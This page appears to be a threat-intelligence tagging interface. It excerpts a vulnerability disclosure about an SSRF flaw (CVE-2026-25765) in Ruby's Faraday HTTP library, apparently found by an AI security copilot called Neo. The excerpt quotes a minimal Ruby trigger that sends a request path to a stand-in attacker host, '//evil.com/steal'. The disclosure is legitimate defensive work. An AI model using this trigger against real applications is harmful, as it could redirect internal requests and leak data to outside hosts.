Project Discovery

How Neo found an SSRF vulnerability in Faraday, and why it matters for every team that ships code

2026-03-03 · Read original ↗

ATT&CK techniques detected

2 predictions

T1190Exploit Public-Facing Application

58%

"a value that passes a “ starts with / ” allowlist can still change the destination host. a minimal trigger looks like this : ruby 1conn = faraday. new ( url : ' < https : / / api. internal. com > ' ) 2conn. get ( ' / / evil. com / steal ' ) if an attacker can influence that path …"

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1190Exploit Public-Facing Application

48%

", like / / evil. com, overriding the destination host insidebuild _ exclusive _ url - cve : cve - 2026 - 25765 - severity : moderate ( cvss 5. 8 ), vector cvss : 3. 1 / av : n / ac : l / pr : n / ui : n / s : c / c : l / i : n / a : n - affected : faraday up to 2. 14. 0 - fixed :…"

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

Summary

Executive Summary Neo found a Server-Side Request Forgery (SSRF) vulnerability in Faraday, a widely used HTTP client library in the Ruby ecosystem. This is Neo’s first credited CVE discovery. Neo is ProjectDiscovery’s AI security copilot for tasks like code review and vulnerability discovery. For this finding, Neo reviewed a widely used open source dependency and, without human guidance, surfaced a subtle URL-handling edge case, validated it in runtime, and produced a clear write-up that maint